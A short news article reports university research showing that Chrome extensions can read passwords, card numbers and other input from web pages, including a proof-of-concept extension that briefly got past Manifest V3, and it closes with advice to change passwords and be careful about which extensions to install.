Researchers with the University of Wisconsin-Madison recently uncovered a shocking vulnerability in Google Chrome Extensions that leaves millions at risk.
Hackers are able to use Chrome Extensions to steal passwords and other important information that is stored in websites’ HTML plaintext.
The explanation isn’t as simple as malware or a virus, but rather subtle data exfiltration tools, coupled with gaps in Chrome’s security combine to create this vulnerability.
A lot of websites store their plaintext passwords in their website’s HTML source code, among other sensitive information. When websites store information using this insecure method, hackers who can access their plaintext data can obtain all of that information.
Many websites also allow extensions to have excessive permissions, leading to situations where the websites are freely granting hackers some of the information they need.
When combined, hackers can take advantage of vulnerable websites to collect the website’s data, as well as your own extremely sensitive information,” the report stated. “The extensions can still access entire contents of the web pages, including text input fields where users may enter sensitive information such as passwords, Social Security Numbers (SSN), and credit card information,” states the report.
According to the research report, over 17,000 popular Chrome extensions contain vulnerabilities that allow for data extraction, while 11% of the top 10,000 websites are susceptible to this type of breach.
To demonstrate how serious these risks were, the researchers created their own Chrome Extension that can capture HTML source code whenever users log into new websites, remove password obfuscation, and monitor user input. While there was no malware or viruses, the application was adept at exfiltrating data.
This extension even briefly bypassed Chrome’s new security protocol, Chrome Extension Manifest V3.
Researchers recommend frequently changing your passwords and being very careful about which extensions you download. Large-scale data breaches have only been increasing in number, and third-party software can often hide malicious files or steal your data.